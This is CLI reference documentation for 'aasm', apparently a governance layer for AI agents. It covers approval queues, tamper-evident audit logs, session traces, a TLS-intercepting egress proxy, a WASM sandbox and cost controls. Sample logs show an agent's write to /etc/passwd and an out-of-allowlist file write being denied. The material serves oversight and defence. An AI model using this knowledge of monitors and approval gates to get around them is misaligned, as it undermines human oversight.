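```python
def timeout_color(seconds_left: int) -> str:
    """Map remaining seconds to the color band used for TIMEOUT_IN."""
    if seconds_left < 60:
        return "red"
    if seconds_left <= 180:
        return "yellow"
    return "green"
```

The request in the sample, with 2m 30s (150 seconds) left, falls in the yellow band.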

aasm approvals get

Show details of a single pending approval request.

Name	Type	Default	Description
`<ID>`	string (arg)	—	Approval request ID to look up.
`--output <FORMAT>`	`table` \| `json` \| `yaml`	global default	Per-command output override.

aasm approvals get ap-77

aasm approvals approve

Approve a pending action.

Name	Type	Default	Description
`<ID>`	string (arg)	—	Approval request ID to approve.
`--reason <REASON>`	string	—	Optional reason. May also be supplied on piped stdin.

aasm approvals approve ap-77 --reason "verified safe"

Approved ap-77.

aasm approvals reject

Reject a pending action. A reason is required in non-interactive mode (supply --reason or pipe it on stdin).

Name	Type	Default	Description
`<ID>`	string (arg)	—	Approval request ID to reject.
`--reason <REASON>`	string	required (non-interactive)	Reason for rejection. May also be piped on stdin.

aasm approvals reject ap-77 --reason "writes outside allowed path"

Rejected ap-77.

aasm approvals watch

Watch for new approval requests in real time over the gateway WebSocket events endpoint (filtered to approval events).

Flag	Type	Default	Description
`-i, --interactive`	flag	off	Enable interactive mode with keyboard shortcuts (`a`=approve, `r`=reject, `q`=quit; arrow keys navigate).

aasm approvals watch --interactive

▶ ap-78  a1b2c3…  network_egress  api.openai.com   3m 00s
  a approve   r reject   ↑/↓ select   q quit

Last updated: 2026-06-11 by Chisanan232

aasm audit

Query audit log entries and export tamper-evident compliance reports.

Synopsis

aasm audit <SUBCOMMAND> [OPTIONS]

Subcommand	Purpose
`list`	Query audit log entries with filters.
`export`	Export audit data fetched from the gateway as CSV/JSON/JSONL.
`verify-chain`	Verify the SHA-256 hash chain of a local JSONL audit file.
`compliance-export`	Full-fidelity compliance export of a local JSONL audit file.

All subcommands accept the global options.

Time filters. --since accepts a duration shorthand (30m, 2h, 1d) or an ISO 8601 timestamp; --until accepts an ISO 8601 timestamp.
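A client that wants to pre-validate these filters could parse them as below. This is a sketch, not the CLI's parser: `parse_since` is a hypothetical helper, only the `m`, `h`, and `d` units from the examples are handled, and treating timestamps without an offset as UTC is an assumption.

```python
import re
from datetime import datetime, timedelta, timezone
from typing import Optional

_UNITS = {"m": "minutes", "h": "hours", "d": "days"}
_SHORTHAND = re.compile(r"(\d+)([mhd])")


def parse_since(value: str, now: Optional[datetime] = None) -> datetime:
    """Turn '30m' / '2h' / '1d' or an ISO 8601 timestamp into an aware datetime."""
    now = now or datetime.now(timezone.utc)
    match = _SHORTHAND.fullmatch(value)
    if match:
        amount, unit = int(match.group(1)), match.group(2)
        return now - timedelta(**{_UNITS[unit]: amount})

    # datetime.fromisoformat rejects a trailing 'Z' before Python 3.11.
    if value.endswith("Z"):
        value = value[:-1] + "+00:00"
    parsed = datetime.fromisoformat(value)  # raises ValueError on bad input
    if parsed.tzinfo is None:
        parsed = parsed.replace(tzinfo=timezone.utc)  # assumption: naive means UTC
    return parsed
```

Passing `now` explicitly keeps the function deterministic, which is convenient when testing filters in CI.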

aasm audit list

Query audit log entries from the gateway (GET /api/v1/logs) with optional filters, rendered as a table (or --output json|yaml). The result column is color-coded: allow=green, deny=red, pending=yellow.

Flag	Type	Default	Description
`--agent <AGENT>`	string	—	Filter by agent identifier.
`--action <ACTION>`	string	—	Filter by action type (e.g. `ToolCallIntercepted`, `PolicyViolation`).
`--result <RESULT>`	`allow` \| `deny` \| `pending`	—	Filter by policy decision result.
`--since <SINCE>`	string	—	Show events after this duration or ISO 8601 timestamp.
`--until <UNTIL>`	string	—	Show events before this ISO 8601 timestamp.
`--limit <LIMIT>`	integer	`50`	Maximum number of entries to return.
`--dry-run-only`	flag	off	Show only observe-mode shadow events (`dry_run: true`). When off (default), shadow events are hidden so you see live enforcement decisions only.

aasm audit list --result deny --since 2h --limit 20

SEQ   TIMESTAMP             AGENT     EVENT             RESULT
142   2026-06-09T14:01:00Z  a1b2c3…   PolicyViolation   deny

aasm audit export

Export audit entries fetched from the gateway to CSV/JSON/JSONL, with optional compliance metadata headers. Writes to stdout unless --output-file is given.

Flag	Type	Default	Description
`--format <FORMAT>`	`csv` \| `json` \| `jsonl`	required	Export file format. JSONL is preferred for SIEM ingestion.
`--compliance <COMPLIANCE>`	`eu-ai-act` \| `soc2`	—	Prepend a compliance metadata header.
`--output-file <OUTPUT_FILE>`	string	(stdout)	Write output to a file. (Named `--output-file` to avoid colliding with the global `--output`.)
`--agent <AGENT>`	string	—	Filter by agent identifier.
`--action <ACTION>`	string	—	Filter by action type.
`--result <RESULT>`	`allow` \| `deny` \| `pending`	—	Filter by policy decision result.
`--since <SINCE>`	string	—	Show events after this duration or ISO 8601 timestamp.
`--until <UNTIL>`	string	—	Show events before this ISO 8601 timestamp.
`--limit <LIMIT>`	integer	`1000`	Maximum number of entries to fetch.

aasm audit export --format jsonl --compliance soc2 --since 1d \
  --output-file audit-2026-06-09.jsonl

aasm audit verify-chain

Verify the SHA-256 hash chain of a local JSONL audit log file. Exits non-zero if the chain is broken (tamper evidence).

Argument	Type	Description
`<PATH>`	path	Path to the JSONL audit log file to verify.

aasm audit verify-chain ./audit/session-7f3a.jsonl

✓ chain valid — 412 entries, genesis → entry 0xab12…
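To illustrate what verifying a hash chain involves, here is a self-contained toy chain. The record layout (`prev_hash`, `payload`, `hash`), the all-zero genesis value, and the way each hash is derived are all assumptions made for this sketch; the gateway's actual JSONL schema is not described here and will differ.

```python
import hashlib
import json
from typing import Iterable, List

GENESIS = "0" * 64  # hypothetical genesis anchor


def entry_hash(prev_hash: str, payload: dict) -> str:
    """Hash the previous link together with a canonical JSON payload."""
    body = json.dumps(payload, sort_keys=True, separators=(",", ":"))
    return hashlib.sha256((prev_hash + body).encode("utf-8")).hexdigest()


def append_entry(chain: List[dict], payload: dict) -> None:
    """Append a payload, linking it to the current tail of the chain."""
    prev = chain[-1]["hash"] if chain else GENESIS
    chain.append({"prev_hash": prev, "payload": payload,
                  "hash": entry_hash(prev, payload)})


def verify_chain(lines: Iterable[str]) -> bool:
    """Return True only if every JSONL entry links to and matches its predecessor."""
    expected_prev = GENESIS
    for line in lines:
        entry = json.loads(line)
        if entry["prev_hash"] != expected_prev:
            return False  # an entry was removed, reordered, or inserted
        if entry["hash"] != entry_hash(entry["prev_hash"], entry["payload"]):
            return False  # the payload was altered after the fact
        expected_prev = entry["hash"]
    return True
```

Because each hash covers the previous one, editing or deleting any entry invalidates every later link, which is what makes the log tamper-evident rather than merely append-only.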

aasm audit compliance-export

Full-fidelity compliance export of a local JSONL audit file. Preserves the SHA-256 hash chain anchors, credential findings (kind + offset only — never the raw secret), and delegation lineage for SIEM ingestion and regulatory review.

Flag	Type	Default	Description
`--input <INPUT>`	path	required	Per-session audit JSONL file produced by the gateway.
`--format <FORMAT>`	`csv` \| `json` \| `jsonl`	`jsonl`	Export format. JSONL is preferred for SIEM/regulator ingestion.
`--compliance <COMPLIANCE>`	`eu-ai-act` \| `soc2`	—	Prepend a compliance framework header.
`--output-file <OUTPUT_FILE>`	path	(stdout)	Write output to a file.
`--agent <AGENT>`	string	—	Filter by hex-encoded agent identifier (32 hex chars).
`--event-type <EVENT_TYPE>`	string	—	Filter by audit event-type label (e.g. `PolicyViolation`).
`--since <SINCE>`	string	—	Include entries after this duration shorthand or ISO 8601 timestamp.
`--until <UNTIL>`	string	—	Include entries before this ISO 8601 timestamp.

aasm audit compliance-export --input ./audit/session-7f3a.jsonl \
  --format jsonl --compliance eu-ai-act --output-file compliance.jsonl

Last updated: 2026-06-11 by Chisanan232

aasm logs

Query and stream audit-log events. In default mode it fetches recent entries over HTTP; with --follow it streams events live over the gateway WebSocket (like tail -f).

Synopsis

aasm logs [OPTIONS]

This command has no subcommands.

Options

Flag	Type	Default	Description
`-f, --follow`	flag	off	Stream events in real time over WebSocket.
`--agent <AGENT>`	string	—	Filter by agent identifier.
`--type <TYPE>`	comma-separated	—	Filter by event type(s). Accepted: `violation`, `approval`, `budget`.
`--since <SINCE>`	string	—	Show events after this duration (`30m`, `2h`, `1d`) or ISO 8601 timestamp.
`--until <UNTIL>`	string	—	Show events before this ISO 8601 timestamp.
`--limit <LIMIT>`	integer	`50`	Maximum number of entries in non-follow mode.
`--no-color`	flag	off	Disable colored output.
`--output <FORMAT>`	`table` \| `json` \| `yaml`	global default	Per-command output override.

Plus the global options.

Examples

Show the last 50 entries:

aasm logs

2026-06-09T14:01:00Z [VIOLATION] a1b2c3…  file_write denied: /etc/passwd
2026-06-09T14:01:05Z [APPROVAL]  a1b2c3…  network_egress pending: api.openai.com

Filter to violations and budget events for one agent:

aasm logs --agent a1b2c3… --type violation,budget --since 1h

Stream live (Ctrl-C to stop):

aasm logs --follow --type violation

Emit JSON for piping into jq:

aasm logs --output json --limit 200 | jq '.[].message'

Last updated: 2026-06-11 by Chisanan232

aasm trace

Visualize a single agent session trace as an indented tree or a horizontal timeline. The trace is fetched from the gateway and the flat span list is folded into a hierarchy (LLM calls, tool calls, tool results, policy allow/deny).

Synopsis

aasm trace [OPTIONS] <SESSION_ID>

This command has no subcommands.

Arguments

Argument	Type	Description
`<SESSION_ID>`	string	Session ID to retrieve the trace for.

Options

Flag	Type	Default	Description
`--format <FORMAT>`	`tree` \| `timeline`	`tree`	Visualization format. `tree` = indented box-drawing tree; `timeline` = horizontal ASCII duration bars.

Plus the global options.

Examples

Tree view (default):

aasm trace 7f3a1c2b

session 7f3a1c2b
├─ 🧠 llm: gpt-4 (1200ms)
│  ├─ 🔧 tool_call: search (340ms)
│  │  └─ 📥 tool_result: search (12ms)
│  └─ ⛔ deny: file_write — path outside allowlist
└─ 🧠 llm: gpt-4 (800ms)
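To make the "flat span list folded into a hierarchy" step concrete, here is a minimal sketch of one way to do it. The Span fields (span_id, parent_id, label) are hypothetical and are not the gateway's trace schema; the rendering only approximates the box-drawing layout shown above.

```python
from dataclasses import dataclass, field
from typing import List, Optional


@dataclass
class Span:
    span_id: str               # hypothetical field names, for illustration only
    parent_id: Optional[str]
    label: str
    children: List["Span"] = field(default_factory=list)


def fold(spans: List[Span]) -> List[Span]:
    """Attach each span to its parent; spans without a known parent become roots."""
    by_id = {s.span_id: s for s in spans}
    roots = []
    for s in spans:
        parent = by_id.get(s.parent_id)
        (parent.children if parent else roots).append(s)
    return roots


def render(nodes: List[Span], prefix: str = "") -> List[str]:
    """Render the hierarchy as an indented box-drawing tree, one line per span."""
    lines = []
    for i, node in enumerate(nodes):
        last = i == len(nodes) - 1
        lines.append(prefix + ("└─ " if last else "├─ ") + node.label)
        lines.extend(render(node.children, prefix + ("   " if last else "│  ")))
    return lines
```

Printing "\n".join(render(fold(spans))) under a session header gives a tree shaped like the example, with the input order of sibling spans preserved.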

Timeline view:

aasm trace 7f3a1c2b --format timeline

llm: gpt-4        ████████████████████  1200ms
tool_call: search ██████                 340ms
llm: gpt-4        █████████████          800ms
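The bar lengths in the sample are consistent with scaling each duration against the longest span. The sketch below shows that idea, assuming a 20-character maximum bar width and simple rounding; the real renderer's width and rounding rules are not documented here.

```python
from typing import List, Tuple


def timeline(spans: List[Tuple[str, int]], width: int = 20) -> List[str]:
    """Render (label, duration_ms) pairs as horizontal bars scaled to the longest span."""
    longest = max(ms for _, ms in spans)
    label_w = max(len(label) for label, _ in spans)
    rows = []
    for label, ms in spans:
        # At least one block so very short spans stay visible (an assumption).
        bar = "█" * max(1, round(ms / longest * width))
        rows.append(f"{label:<{label_w}} {bar:<{width}} {ms:>5}ms")
    return rows
```

With the durations from the example (1200, 340, 800 ms) this produces bars of 20, 6, and 13 blocks.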

Last updated: 2026-06-11 by Chisanan232

aasm cost

Query cost summary and forecast spending.

Synopsis

aasm cost <SUBCOMMAND> [OPTIONS]

Subcommand	Purpose
`summary`	Show cost summary for the current period.
`forecast`	Forecast monthly spend from the current daily rate.

Both subcommands accept the global options.

aasm cost summary

Show the cost summary for a time period, optionally grouped by a dimension.

Flag	Type	Default	Description
`--period <PERIOD>`	`today` \| `month`	`today`	Time period to report on.
`--group-by <GROUP_BY>`	`agent`	—	Group spend by dimension.

aasm cost summary --period month --group-by agent

Cost Summary (month, 2026-06)
  Total: $312.40 / $1,000.00  (31.2%)

  AGENT      MONTHLY SPEND
  a1b2c3…    $180.10
  d4e5f6…    $132.30

aasm cost forecast

Forecast monthly spending by extrapolating the current daily rate over the remaining days of the month. Takes no flags of its own (uses the global --output).

aasm cost forecast

Cost Forecast (2026-06-09, day 9 of 30)
  Current daily spend:      $12.50
  Projected monthly spend:  $375.00
  Monthly limit:            $1,000.00
  Projected utilization:    37.5%
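The sample figures are consistent with a simple linear extrapolation. The sketch below reproduces them under one assumption that the output does not show: spend to date equals the current daily rate multiplied by the days elapsed. The function name and return shape are illustrative only.

```python
import calendar
from datetime import date


def forecast(daily_rate: float, today: date, monthly_limit: float) -> dict:
    """Extrapolate the current daily rate over the rest of the month."""
    days_in_month = calendar.monthrange(today.year, today.month)[1]
    spent_so_far = daily_rate * today.day            # assumption: rate held since day 1
    remaining_days = days_in_month - today.day
    projected = spent_so_far + daily_rate * remaining_days
    return {
        "day": today.day,
        "days_in_month": days_in_month,
        "projected": projected,
        "utilization_pct": projected / monthly_limit * 100,
    }
```

For a daily rate of $12.50 on 2026-06-09 with a $1,000.00 limit, this gives a projected spend of $375.00 and 37.5% utilization, matching the example.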

Last updated: 2026-06-11 by Chisanan232

aasm dashboard

Real-time governance monitoring. With no subcommand, aasm dashboard opens an interactive terminal (TUI) dashboard. The subcommands manage an embedded single-page-app (SPA) web server instead.

Synopsis

aasm dashboard [SUBCOMMAND] [OPTIONS]

Form	Purpose
`aasm dashboard` (no subcommand)	Open the interactive TUI dashboard.
`start`	Serve the embedded SPA over HTTP.
`open`	Open the browser to an already-running dashboard.
`stop`	Stop a dashboard server started with `start`.

The TUI streams status over HTTP polling plus a WebSocket event feed. Panels: fleet health + agents, event log, budget bars, and the pending-approvals queue with countdown timers. Keyboard shortcuts: Tab/Shift-Tab to cycle panels, arrows to select, a/r to approve/reject, p for the policy viewer, ? for help, q to quit.

The dashboard port is resolved in this order (highest precedence first): AASM_DASHBOARD_PORT env var → --port flag → dashboard.port in ~/.aa/config.yaml (default 3000).
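The precedence chain above can be read as a short fall-through. This is a minimal sketch of that order as stated on this page, with a hypothetical function name and plain arguments standing in for the real environment, flag parser, and config loader.

```python
from typing import Mapping, Optional

DEFAULT_PORT = 3000  # documented default for dashboard.port


def resolve_dashboard_port(
    env: Mapping[str, str],
    flag: Optional[int],
    config_port: Optional[int],
) -> int:
    """Apply the documented order: env var, then --port, then config, then default."""
    raw = env.get("AASM_DASHBOARD_PORT")
    if raw:
        return int(raw)
    if flag is not None:
        return flag
    if config_port is not None:
        return config_port
    return DEFAULT_PORT
```

For example, resolve_dashboard_port(os.environ, flag=None, config_port=None) falls back to 3000 when nothing is configured.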

aasm dashboard start

Serve the embedded SPA at http://127.0.0.1:<port>. Blocks until Ctrl-C. Reverse-proxies /api/* to the configured gateway.

Flag	Type	Default	Description
`--port <PORT>`	integer	`3000` (config)	Port to listen on. Overrides config; also reads `AASM_DASHBOARD_PORT`.
`--open`	flag	off	Open the system browser once the server is ready.

aasm dashboard start --port 8088 --open

Dashboard serving at http://127.0.0.1:8088  (Ctrl-C to stop)

With --open, once the server is up the browser opens to the dashboard home (overview) page, which confirms that the dashboard is set up and running:

[Screenshot: web dashboard, home/overview view after aasm dashboard start]

Navigating to the Live Operations route lays out the L1→L2→L3 traffic pipeline, a tail -f event stream with filters, and the approval queue:

[Screenshot: web dashboard, Live Operations route served by aasm dashboard start]

Both screenshots were captured against the open-source local-mode gateway, which serves the SPA but not the live event/approval data API (that API belongs to the hosted control plane), so the stream shows “reconnecting…” and the pipeline columns are empty. The chrome and layout are those of the real dashboard. See Observe in the dashboard for more.

aasm dashboard open

Open the system browser to an already-running dashboard server.

Flag	Type	Default	Description
`--port <PORT>`	integer	`3000` (config)	Port to connect to. Overrides config; also reads `AASM_DASHBOARD_PORT`.

aasm dashboard open --port 8088

aasm dashboard stop

Stop a dashboard server previously started with aasm dashboard start. Takes no flags.

aasm dashboard stop

Dashboard server stopped.

Last updated: 2026-06-12 by Chisanan232

aasm gateway

Manage the aa-gateway governance daemon directly — the process that holds the agent registry, evaluates the policy engine, and writes the audit log.

aasm gateway start runs the gateway with low-level flags (listen address, socket, policy path). For the higher-level local developer workflow (deployment mode + dashboard), see aasm start.

Synopsis

aasm gateway <SUBCOMMAND> [OPTIONS]

Subcommand	Purpose
`start`	Spawn `aa-gateway` as a detached background process.
`stop`	Terminate a running gateway (SIGTERM → SIGKILL fallback).
`status`	Report whether the gateway is running and serving gRPC.
`logs`	Tail the gateway log file.

aasm gateway start

Spawn aa-gateway in the background (or foreground with --no-detach). The binary is resolved from $PATH, then ~/.cargo/bin, then ./target/release, then ./target/debug.

Flag	Type	Default	Description
`--policy <POLICY>`	path	`$AA_POLICY` → `~/.aasm/policy.yaml` → `/etc/aasm/policy.yaml`	Policy YAML file.
`--listen <LISTEN>`	string	`127.0.0.1:50051`	TCP listen address.
`--socket <SOCKET>`	path	—	Unix domain socket path. Takes precedence over `--listen`.
`--no-detach`	flag	off	Block the caller instead of detaching to the background.
`--log-file <LOG_FILE>`	path	`~/.aasm/logs/gateway.log`	Log file for gateway stdout/stderr.

aasm gateway start --listen 127.0.0.1:50051 --policy ./policy.yaml
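The binary lookup order described above ($PATH, then ~/.cargo/bin, ./target/release, ./target/debug) can be sketched as follows. The function name and the injectable which/is_file parameters are choices made for this example so the logic can be exercised without a real installation.

```python
import os
import shutil
from typing import Callable, Optional

# Fallback directories, in the order listed for aasm gateway start.
FALLBACK_DIRS = ("~/.cargo/bin", "./target/release", "./target/debug")


def resolve_binary(
    name: str,
    which: Callable[[str], Optional[str]] = shutil.which,
    is_file: Callable[[str], bool] = os.path.isfile,
) -> Optional[str]:
    """Return the first matching binary path, or None if nothing is found."""
    found = which(name)                      # 1. search $PATH
    if found:
        return found
    for directory in FALLBACK_DIRS:          # 2. documented fallback directories
        candidate = os.path.join(os.path.expanduser(directory), name)
        if is_file(candidate):
            return candidate
    return None
```

resolve_binary("aa-gateway") returns None when no candidate exists, which is the case where a launcher would need to report that the binary is missing.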

aasm gateway stop

Terminate a running gateway gracefully (SIGTERM, escalating to SIGKILL). Takes no flags.

aasm gateway stop

aasm gateway status

Report whether aa-gateway is running and serving gRPC.

Flag	Type	Default	Description
`--json`	flag	off	Emit machine-readable JSON instead of human-readable text.

aasm gateway status --json

{ "running": true, "pid": 48213, "listen": "127.0.0.1:50051", "uptime_seconds": 8133 }

aasm gateway logs

Tail the gateway log file, with optional level filtering. Non-JSON lines pass through so operator notes are preserved.

Flag	Type	Default	Description
`-f, --follow`	flag	off	Stream new log entries in real time (like `tail -f`).
`--lines <LINES>`	integer	`50`	Number of lines to show from the end of the log.
`--level <LEVEL>`	log level	—	Filter entries by minimum severity.
`--log-file <LOG_FILE>`	path	`~/.aasm/logs/gateway.log`	Path to the log file.

aasm gateway logs --follow --level warn

Last updated: 2026-06-11 by Chisanan232

aasm proxy

Manage the aa-proxy sidecar — its lifecycle, the per-host CA trust, and log tailing. The proxy intercepts outbound HTTPS via MitM so network-egress policy can be enforced without code changes (layer 2 of the three-layer model).

Synopsis

aasm proxy <SUBCOMMAND> [OPTIONS]

Subcommand	Purpose
`start`	Spawn the proxy sidecar (background or foreground).
`stop`	Stop the running proxy.
`status`	Show whether the proxy is running.
`install-ca`	Install the proxy CA into the OS trust store.
`uninstall-ca`	Remove the proxy CA from the OS trust store.
`logs`	Tail the proxy log file.

aasm proxy start

Spawn aa-proxy in the background (or foreground with --no-detach). The binary is resolved from $PATH, then ~/.cargo/bin, then ./target/release.

Flag	Type	Default	Description
`--listen <LISTEN>`	string	`127.0.0.1:8899` (env `AA_PROXY_ADDR`)	Address the proxy listens on.
`--gateway <GATEWAY>`	string	env `AA_GATEWAY_URL`	Gateway URL to forward policy decisions to.
`--ca-dir <CA_DIR>`	path	env `AA_CA_DIR`	Directory for CA certificate and key storage.
`--no-detach`	flag	off	Run in the foreground instead of daemonizing.
`--log-file <LOG_FILE>`	path	—	Redirect proxy stdout/stderr to this file (background mode only).

aasm proxy start --listen 127.0.0.1:8899 --gateway http://localhost:50051

aasm proxy stop

Stop the running proxy sidecar. Takes no flags.

aasm proxy stop

aasm proxy status

Show whether the proxy sidecar is running (confirmed via a TCP connect probe).

Flag	Type	Default	Description
`--json`	flag	off	Emit machine-readable JSON output.

aasm proxy status --json

aasm proxy install-ca

Install the proxy CA certificate into the OS trust store so intercepted TLS connections validate.

Flag	Type	Default	Description
`--ca-dir <CA_DIR>`	path	env `AA_CA_DIR`	Directory where the CA certificate and key are stored.
`--yes`	flag	off	Skip the confirmation prompt.

aasm proxy install-ca --yes

aasm proxy uninstall-ca

Remove the proxy CA certificate from the OS trust store. Same options as install-ca.

Flag	Type	Default	Description
`--ca-dir <CA_DIR>`	path	env `AA_CA_DIR`	Directory where the CA certificate and key are stored.
`--yes`	flag	off	Skip the confirmation prompt.

aasm proxy uninstall-ca --yes

aasm proxy logs

Tail the proxy log file, with optional level/time filtering.

Flag	Type	Default	Description
`-f, --follow`	flag	off	Stream new log entries continuously (like `tail -f`).
`--lines <LINES>`	integer	`50`	Number of lines to show from the end of the log.
`--level <LEVEL>`	string	—	Filter to lines at or above this level: `error`, `warn`, `info`, `debug`.
`--since <DURATION>`	string	—	Show only entries since a relative duration (e.g. `5m`, `1h`, `30s`).

aasm proxy logs --follow --level warn --since 10m

Last updated: 2026-06-11 by Chisanan232

aasm start / aasm stop

Start and stop the locally-managed Agent Assembly gateway. These are the high-level developer-laptop commands: aasm start picks a deployment mode, binds the right address, runs the gateway in the background, and (in local mode) enables the dashboard. aasm stop terminates it gracefully and cleans up the PID file.

For low-level gateway control (explicit listen address, Unix socket, policy path), see aasm gateway.

aasm start

Synopsis

aasm start [OPTIONS]

Options

Flag	Type	Default	Description
`--mode <MODE>`	`local` \| `remote`	`local`	Deployment mode. `local` binds `127.0.0.1` (loopback only); `remote` binds `0.0.0.0`.
`--port <PORT>`	integer	`7391`	TCP port the gateway listens on.
`--config <CONFIG>`	path	`~/.aasm/config.yaml`	YAML config file consumed by the gateway.
`--foreground`	flag	off	Stay in the foreground; do not daemonize.
`--no-dashboard`	flag	off	Disable dashboard serving (even in local mode).

Behavior

Resolve the listen address from mode + port.
Exit early (idempotent) if a gateway is already running at that address — verified by a live PID file and a successful TCP probe.
Spawn aa-gateway (background, or foreground with --foreground).
In background mode, write the PID file and wait for the listener before printing the success banner.

Exit 0 on a normal start, an idempotent “already running” path, or a clean foreground exit. Exit non-zero if the readiness probe times out or the spawn fails.
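The address resolution and readiness check in the steps above can be approximated like this. It is a sketch only: the helper names, the 10-second deadline, and the polling interval are assumptions, since the page does not state the actual readiness timeout.

```python
import socket
import time
from typing import Tuple


def listen_address(mode: str, port: int = 7391) -> Tuple[str, int]:
    """Map the deployment mode to a bind host: local is loopback, remote is all interfaces."""
    hosts = {"local": "127.0.0.1", "remote": "0.0.0.0"}
    return hosts[mode], port


def tcp_probe(host: str, port: int, timeout_s: float = 0.5) -> bool:
    """Return True if something accepts a TCP connection at host:port."""
    try:
        with socket.create_connection((host, port), timeout=timeout_s):
            return True
    except OSError:
        return False


def wait_for_listener(host: str, port: int, deadline_s: float = 10.0, poll_s: float = 0.1) -> bool:
    """Poll until the listener is up or the (assumed) deadline passes."""
    end = time.monotonic() + deadline_s
    while time.monotonic() < end:
        if tcp_probe(host, port):
            return True
        time.sleep(poll_s)
    return False
```

A launcher built this way would print its success banner only after wait_for_listener returns True, and exit non-zero otherwise.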

Example

aasm start --mode local --port 7391

Agent Assembly gateway started (pid 48213)
  Gateway:    http://localhost:7391
  Dashboard:  http://localhost:7391

aasm stop

Synopsis

aasm stop [OPTIONS]

Options

Flag	Type	Default	Description
`--timeout <TIMEOUT>`	integer (seconds)	`30`	Seconds to wait for graceful shutdown before sending SIGKILL.

Behavior

Resolves the PID file (~/.aasm/gateway.pid) and chooses one of four terminal states — no PID file, stale PID file, graceful SIGTERM, or escalated SIGKILL — always cleaning up the PID file so the next aasm start sees a clean slate.
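The four terminal states can be sketched as a small state machine. Everything here is illustrative: the function name, the returned labels, and the injected callables (read_pid, is_alive, send, remove_pid_file) are hypothetical stand-ins for reading ~/.aasm/gateway.pid and signalling the process.

```python
import signal
import time
from typing import Callable, Optional


def stop_gateway(
    read_pid: Callable[[], Optional[int]],
    is_alive: Callable[[int], bool],
    send: Callable[[int, int], None],
    remove_pid_file: Callable[[], None],
    timeout_s: float = 30.0,
    poll_s: float = 0.1,
) -> str:
    """Return which of the four terminal states was reached."""
    pid = read_pid()
    if pid is None:
        return "no-pid-file"
    try:
        if not is_alive(pid):
            return "stale-pid-file"
        send(pid, signal.SIGTERM)                 # ask for a graceful shutdown
        deadline = time.monotonic() + timeout_s
        while time.monotonic() < deadline:
            if not is_alive(pid):
                return "graceful"
            time.sleep(poll_s)
        send(pid, signal.SIGKILL)                 # escalate after the timeout
        return "killed"
    finally:
        remove_pid_file()                         # always leave a clean slate
```

In a real wiring on a Unix host, send could be os.kill and is_alive could probe the process with os.kill(pid, 0); those choices are assumptions, not a description of the CLI's internals.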

Example

aasm stop --timeout 15

Sent SIGTERM to pid 48213; exited gracefully.

Last updated: 2026-06-11 by Chisanan232

aasm sandbox

Run a WebAssembly tool inside the Agent Assembly tool-execution sandbox, with filesystem, CPU (instruction fuel), memory, and wall-clock isolation. This surfaces the aa-sandbox runtime to the CLI without going through the cloud /dispatch_tool HTTP route.

Synopsis

aasm sandbox <SUBCOMMAND> [OPTIONS]

Subcommand	Purpose
`run`	Run a `.wasm` module inside a fresh sandbox.
`info`	Show the default sandbox runtime limits.

aasm sandbox run

Run a WebAssembly module under WASI preview 1 inside a fresh sandbox and report the outcome. Unset limits fall back to the safe-by-default values.

Name	Type	Default	Description
`<WASM>`	path (arg)	—	Path to a `.wasm` module to execute under WASI preview 1.
`--fuel <FUEL>`	integer	`10000000` (10M)	Wasmtime instruction-fuel budget. Raise for long-running tools.
`--memory-pages <MEMORY_PAGES>`	integer	`16` (1 MiB)	Maximum linear-memory pages (1 page = 64 KiB).
`--wall-clock-ms <WALL_CLOCK_MS>`	integer	`5000` (5s)	Wall-clock deadline in milliseconds.

aasm sandbox run ./tool.wasm --fuel 50000000 --wall-clock-ms 10000

Sandbox run: ./tool.wasm
  Outcome:    completed
  Fuel used:  3,201,884 / 50,000,000
  Wall time:  812ms / 10000ms
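When choosing a --memory-pages value, the arithmetic is just multiples of the 64 KiB WebAssembly page. A small sketch, with helper names invented for this example:

```python
WASM_PAGE_BYTES = 64 * 1024  # 1 page = 64 KiB


def pages_to_bytes(pages: int) -> int:
    """Size of the linear-memory cap implied by a page count."""
    return pages * WASM_PAGE_BYTES


def pages_for_bytes(n_bytes: int) -> int:
    """Smallest page count that covers n_bytes (ceiling division)."""
    return -(-n_bytes // WASM_PAGE_BYTES)
```

The default of 16 pages corresponds to 1 MiB; a tool that needs 4 MiB of linear memory would need --memory-pages 64.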

aasm sandbox info

Show the default sandbox runtime limits. Takes no arguments.

aasm sandbox info

Default sandbox limits:
  Fuel:           10,000,000 units
  Memory pages:   16  (1 MiB)
  Wall clock:     5000 ms

Last updated: 2026-06-11 by Chisanan232

aasm config

Validate and boot an agent-assembly.toml runtime configuration file. These subcommands operate on the runtime TOML (storage drivers, etc.), which is distinct from the CLI’s own ~/.aa/config.yaml connection profiles (see aasm context).

Synopsis

aasm config <SUBCOMMAND>

Subcommand	Purpose
`validate`	Validate an `agent-assembly.toml` (currently the `[storage]` section).
`boot`	Build the `[storage]` backends and run a sample policy lookup.

aasm config validate

Parse the TOML file and resolve every [storage] driver name against the built-in driver registry. Exits 0 when valid; 1 with the error on stderr otherwise. Unknown sections are ignored.

Argument	Type	Description
`<FILE>`	path	Path to the `agent-assembly.toml` file to validate.

aasm config validate ./agent-assembly.toml

✓ agent-assembly.toml valid — storage driver: memory

aasm config boot

Resolve every [storage] driver through the registry, build each backend, and perform a sample policy lookup to confirm the configuration actually boots. Exits 0 on success; 1 with the error on stderr.

Argument	Type	Description
`<FILE>`	path	Path to the `agent-assembly.toml` file to boot from.

aasm config boot ./agent-assembly.toml

✓ booted storage backends; sample policy lookup OK

Last updated: 2026-06-11 by Chisanan232

aasm context

Manage named API contexts (connection profiles) stored in ~/.aa/config.yaml. A context bundles an API URL and optional API key under a name so you can switch between gateways with --context <name>.

See Config and context resolution for how the active context is resolved.

Synopsis

aasm context <SUBCOMMAND> [OPTIONS]

Subcommand	Purpose
`list`	List all configured contexts.
`set`	Create or update a named context.
`use`	Switch the default context.

aasm context list

List all configured contexts with their API URLs. Takes no arguments.

aasm context list

NAME         API URL                       DEFAULT
production   https://api.example.com       *
staging      https://staging.example.com

aasm context set

Create or update a named context.

Name	Type	Default	Description
`<NAME>`	string (arg)	—	Name of the context to create or update.
`--api-url <API_URL>`	string	required	API URL for this context.
`--api-key <API_KEY>`	string	—	API key for this context (optional).

aasm context set staging --api-url https://staging.example.com

Saved context 'staging'.

aasm context use

Switch the default context (the one used when --context is not passed).

Argument	Type	Description
`<NAME>`	string	Name of the context to set as default.

aasm context use production

Default context set to 'production'.

Last updated: 2026-06-11 by Chisanan232

aasm admin

Gateway administrative operations. The current scope is manual retention; more admin subcommands will be added as the operator surface grows.

Synopsis

aasm admin <SUBCOMMAND> [OPTIONS]

Subcommand	Purpose
`run-retention`	Trigger one manual retention pass against the running gateway.

The subcommand accepts the global options. Output defaults to pretty-printed JSON; pass --output yaml for YAML.

aasm admin run-retention

